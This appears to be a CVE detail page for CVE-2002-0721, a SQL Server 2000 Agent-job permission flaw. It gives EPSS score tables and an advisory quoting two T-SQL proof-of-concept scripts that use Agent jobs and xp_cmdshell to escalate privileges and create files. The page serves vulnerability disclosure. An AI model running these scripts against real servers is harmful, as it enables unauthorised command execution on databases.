CVE-2002-0721 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

Date	EPSS V0	EPSS V1	EPSS V2 (> 2022-02-04)	EPSS V3 (> 2025-03-07)	EPSS V4 (> 2025-03-17)
2022-02-06	–	–	40.85%	–	–
2023-03-12	–	–	–	6.16%	–
2023-07-09	–	–	–	6.16%	–
2024-06-02	–	–	–	6.16%	–
2024-12-22	–	–	–	6.16%	–
2025-01-12	–	–	–	6.16%	–
2025-01-19	–	–	–	6.16%	–
2025-03-18	–	–	–	–	42.39%
2025-03-30	–	–	–	–	54.35%
2025-03-30	–	–	–	–	54.35,%

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Date	Percentile
2022-02-06	98%
2023-03-12	92%
2023-07-09	93%
2024-06-02	94%
2024-12-22	93%
2025-01-12	94%
2025-01-19	94%
2025-03-18	97%
2025-03-30	98%
2025-03-30	98%

source: https://www.securityfocus.com/bid/5483/info Microsoft SQL Server 2000 uses an Agent which is responsible for restarting the SQL Server service, replication, and running scheduled jobs. Some of the jobs that the Agent executes have weak permissions, which could allow a user with low permissions to perform actions on the database in the context of the SQL Server Service Account when used in conjunction with the Microsoft SQL Server Extended Stored Procedure Privilege Elevation Vulnerability -- GetSystemOnSQL -- For this to work the SQL Agent should be running. -- Further, you'll need to change SERVER_NAME in -- sp_add_jobserver to the SQL Server of your choice -- -- David Litchfield -- (david@ngssoftware.com) -- 18th July 2002 USE msdb EXEC sp_add_job @job_name = 'GetSystemOnSQL', @enabled = 1, @description = 'This will give a low privileged user access to xp_cmdshell', @delete_level = 1 EXEC sp_add_jobstep @job_name = 'GetSystemOnSQL', @step_name = 'Exec my sql', @subsystem = 'TSQL', @command = 'exec master..xp_execresultset N''select ''''exec master..xp_cmdshell "dir > c:\agent-job-results.txt"'''''',N''Master''' EXEC sp_add_jobserver @job_name = 'GetSystemOnSQL', @server_name = 'SERVER_NAME' EXEC sp_start_job @job_name = 'GetSystemOnSQL' The following proof of concept code supplied by David Litchfield <david@ngssoftware.com> will create a file called c:\sqlafc123.txt: -- ArbitraryFileCreate -- For this to work the SQL Agent should be running. -- Further, you'll need to change SERVER_NAME in -- sp_add_jobserver to the SQL Server of your choice -- -- David Litchfield -- (david@ngssoftware.com) -- 19th August 2002 USE msdb EXEC sp_add_job @job_name = 'ArbitraryFileCreate', @enabled = 1, @description = 'This will create a file called c:\sqlafc123.txt', @delete_level = 1 EXEC sp_add_jobstep @job_name = 'ArbitraryFileCreate', @step_name = 'SQLAFC', @subsystem = 'TSQL', @command = 'select ''hello, this file was created by the SQL Agent.''', @output_file_name = 'c:\sqlafc123.txt' EXEC sp_add_jobserver @job_name = 'ArbitraryFileCreate', @server_name = 'SERVER_NAME' EXEC sp_start_job @job_name = 'ArbitraryFileCreate'